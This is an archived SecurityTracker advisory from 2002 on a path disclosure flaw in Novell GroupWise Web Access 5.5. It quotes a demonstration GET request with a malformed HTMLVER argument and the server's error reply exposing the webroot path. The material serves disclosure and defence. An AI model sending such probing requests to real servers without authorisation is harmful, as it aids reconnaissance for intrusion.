SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Report a Bug
Report a vulnerability that you have found to SecurityTracker -- bugs@securitytracker.com
Questions?
Want to learn about SecurityTracker? We've got answers to frequently asked questions right here
Sign Up!





Category:  Application (Generic)  >  GroupWise Vendors:  Novell
Novell GroupWise Server Discloses Web Installation Path to Remote Users
Date:  Feb 28 2002
Impact:  Disclosure of system information
Exploit Included:  Yes  
Advisory:  SecurityOffice.net
Version(s): 5.5
Description:  SecurityOffice.net reported an information disclosure vulnerability in Novell's GroupWise software. A remote user can determine the web installation path.

It is reported that a remote user can submit an HTTP GET request that contains unexpected arguments for script variables to cause the server to generate an error message that displays the path to the webroot directory.

A demonstration exploit URL is provided:

GET /cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA HTTP/1.0
Impact:  A remote user can determine the web root directory on the server.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.novell.com/products/groupwise/ (Links to External Site)
Cause:  Exception handling error
Underlying OS:  Windows (NT), Windows (2000)

Message History:   None.

 Source Message Contents
Date:  Wed, 27 Feb 2002 18:57:57 -0500
Subject:  Novell GroupWise Web Access Path Disclosure Vulnerability

 

Novell GroupWise Web Access Path Disclosure Vulnerability

Type

Input Validation Error

Release Date

February 28, 2002

Product / Vendor

Novell GroupWise, the premier communication and collaboration tool for
the one Net environment, helps you tackle some of the toughest business
challenges you face. Whether your organization is small, midsize or
large, your employees need e-mail, calendaring, document management and
other collaborative tools to open up the lines of communication and keep
your business running efficiently. 

http://www.novell.com/products/groupwise/

Summary

If an attacker submits a web request containing unexpected arguments for
script variables, an error message will be displayed containing the path
to the webroot directory of the server running the GroupWise Web Access.

Exploit

GET /cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA HTTP/1.0

HTTP/1.1 200 Document Follows
Date: Wed, 27 Feb 2002 22:27:08 GMT
Server:
MIME-version: 1.0
Content-type: text/html
Connection: close

Could not find file SYS:\NOVONYX\SUITES~1\CGI-BIN\GW5\US\AAA\LOGIN.HTM

Tested

Netware Enterprise Web Server 5.1 / GroupWise Web Access 5.5

Vulnerable

GroupWise Web Access 5.5 (And may be other.)

Disclaimer

http://www.securityoffice.net is not responsible for the misuse or
illegal use of any of the information and/or the software listed on this
security advisory.

Author

Tamer Sahin
ts@securityoffice.net
http://www.securityoffice.net


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2002, SecurityGlobal.net LLC